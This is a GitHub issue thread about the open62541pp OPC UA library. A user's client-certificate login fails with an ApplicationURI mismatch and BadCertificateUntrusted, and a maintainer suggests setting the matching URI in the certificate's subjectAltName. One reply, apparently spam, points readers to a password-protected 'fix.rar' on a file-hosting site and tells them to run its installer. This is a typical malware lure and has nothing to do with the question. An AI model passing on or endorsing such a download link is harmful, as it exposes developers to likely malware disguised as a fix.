open62541pp/open62541pp #314: Client login with cert example

Samega7Cattac, 2024-08-26:
I'm doing a small test.
Create a client to connect to a server using login (with the 3 Security Modes).

From what I understood from the docs and tests in the repo this should work:
```cpp
// STD headers
#include <iostream>

// OPEN62541 headers
#include <open62541pp/open62541pp.h>

constexpr const char SERVER_URL[] = "opc.tcp://192.168.122.10:62640/IntegrationObjects/ServerSimulator";

// Test this with None, Sign and SignAndEncrypt
constexpr const opcua::MessageSecurityMode SECURITY_MODE = opcua::MessageSecurityMode::Sign;

constexpr const char USERNAME[] = "test";

constexpr const char PASSWORD[] = "test";

constexpr const char CLIENT_URI[] = "urn:client:test";

constexpr const size_t KEY_SIZE = 2048L;

void TestClient(opcua::Client& client);

int main()
{
    opcua::Login login;
    login.username = USERNAME;
    login.password = PASSWORD;

    try
    {
        const opcua::crypto::CreateCertificateResult client_cert =
            opcua::crypto::createCertificate(
                {
                    opcua::String{"C=DE"},
                    opcua::String{"O=Test"},
                    opcua::String{"CN=test@localhost"},
                },
                {
                    opcua::String{"DNS:localhost"},
                    opcua::String{std::string("URI:").append(CLIENT_URI)},
                },
                KEY_SIZE
            );

        opcua::Client client(client_cert.certificate, client_cert.privateKey, {}, {});

        client.setSecurityMode(SECURITY_MODE);

        client.connect(SERVER_URL, login);
        TestClient(client);
    }
    catch(const std::exception& e)
    {
        std::cerr << e.what() << std::endl;
        return 1;
    }

    return 0;
}

void
TestClient(opcua::Client& client)
{
    opcua::Node<opcua::Client> node = client.getNode(opcua::VariableId::Server_ServerStatus_CurrentTime);
    const opcua::DateTime dt = node.readValueScalar<opcua::DateTime>();
    client.disconnect();
[... 32 lines cut ...]
[2024-08-26 15:56:36.232 (UTC+0100)] warn/client        The configured ApplicationURI does not match the URI specified in the certificate for the SecurityPolicy http://opcfoundation.org/UA/SecurityPolicy#None
[2024-08-26 15:56:36.232 (UTC+0100)] warn/client        The configured ApplicationURI does not match the URI specified in the certificate for the SecurityPolicy http://opcfoundation.org/UA/SecurityPolicy#Basic128Rsa15
[2024-08-26 15:56:36.232 (UTC+0100)] warn/client        The configured ApplicationURI does not match the URI specified in the certificate for the SecurityPolicy http://opcfoundation.org/UA/SecurityPolicy#Basic256
[2024-08-26 15:56:36.232 (UTC+0100)] warn/client        The configured ApplicationURI does not match the URI specified in the certificate for the SecurityPolicy http://opcfoundation.org/UA/SecurityPolicy#Basic256Sha256
[2024-08-26 15:56:36.233 (UTC+0100)] warn/client        The configured ApplicationURI does not match the URI specified in the certificate for the SecurityPolicy http://opcfoundation.org/UA/SecurityPolicy#Aes128_Sha256_RsaOaep
[2024-08-26 15:56:36.234 (UTC+0100)] info/securitypolicy        The basic256 security policy channel with openssl is created.
[2024-08-26 15:56:36.335 (UTC+0100)] warn/channel       Connection 3 | SecureChannel 0 | Receiving the response failed with StatusCode BadCertificateUntrusted
[2024-08-26 15:56:36.335 (UTC+0100)] info/securitypolicy        The basic256 security policy channel with openssl is deleted.
[2024-08-26 15:56:36.335 (UTC+0100)] warn/client        The DiscoveryUrl returned by the FindServers service (opc.tcp://localhost:62640/IntegrationObjects/ServerSimulator) could not be connected. Trying with the original EndpointUrl.
[2024-08-26 15:56:36.335 (UTC+0100)] info/client        Client Status: ChannelState: Closed, SessionState: Closed, ConnectStatus: Good
[2024-08-26 15:56:36.335 (UTC+0100)] warn/client        The configured ApplicationURI does not match the URI specified in the certificate for the SecurityPolicy http://opcfoundation.org/UA/SecurityPolicy#None
[2024-08-26 15:56:36.336 (UTC+0100)] warn/client        The configured ApplicationURI does not match the URI specified in the certificate for the SecurityPolicy http://opcfoundation.org/UA/SecurityPolicy#Basic128Rsa15
[2024-08-26 15:56:36.336 (UTC+0100)] warn/client        The configured ApplicationURI does not match the URI specified in the certificate for the SecurityPolicy http://opcfoundation.org/UA/SecurityPolicy#Basic256
[2024-08-26 15:56:36.336 (UTC+0100)] warn/client        The configured ApplicationURI does not match the URI specified in the certificate for the SecurityPolicy http://opcfoundation.org/UA/SecurityPolicy#Basic256Sha256
[2024-08-26 15:56:36.336 (UTC+0100)] warn/client        The configured ApplicationURI does not match the URI specified in the certificate for the SecurityPolicy http://opcfoundation.org/UA/SecurityPolicy#Aes128_Sha256_RsaOaep
[2024-08-26 15:56:36.338 (UTC+0100)] info/securitypolicy        The basic256 security policy channel with openssl is created.
[2024-08-26 15:56:36.397 (UTC+0100)] warn/channel       Connection 3 | SecureChannel 0 | Receiving the response failed with StatusCode BadCertificateUntrusted
[2024-08-26 15:56:36.397 (UTC+0100)] info/securitypolicy        The basic256 security policy channel with openssl is deleted.
[2024-08-26 15:56:36.398 (UTC+0100)] info/client        Client Status: ChannelState: Closed, SessionState: Closed, ConnectStatus: BadConnectionClosed
BadConnectionClosed
```

Am I generating the cert wrong?
How can I use a specific SecurityPolicy?
How can I save the server certs so I can set them has trusted on the next run?

TechnoSpelie, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

lukasberbuer, 2024-10-08:
Hi @Samega7Cattac, sorry for the long delay.
The error seems to be very clear:
`The configured ApplicationURI does not match the URI specified in the certificate for the SecurityPolicy ...`

If you look at the documentation of the createCertificate function, you see, that you can pass the `URI` parameter as an `subjectAltName` element:

```cpp
/**
 * Create a self-signed X.509 v3 certificate.
 *
 * It is recommended to store the generated certificate on disk for reuse, so the application can be
 * recognized across several executions.
 *
 * @note Only available with open62541 >= v1.3 and OpenSSL/LibreSSL
 *
 * @param subject Elements for the subject,
 *        e.g. {"C=DE", "O=SampleOrganization", "CN=Open62541Server@localhost"}
 * @param subjectAltName Elements for SubjectAltName,
 *        e.g. {"DNS:localhost", "URI:urn:open62541.server.application"}
 * @param certificateFormat Certificate format, either DER or PEM
 *
 * @exception BadStatus (BadOutOfMemory)
 * @exception CreateCertificateError
 *
 * @see UA_CreateCertificate
 */
CreateCertificateResult createCertificate(
    Span<const String> subject,
    Span<const String> subjectAltName,
    CertificateFormat certificateFormat = CertificateFormat::DER
);
```

I would expect, that the server's application URI has to match the URI in the certificate. Can you try this please?

closed 2024-10-25 by lukasberbuer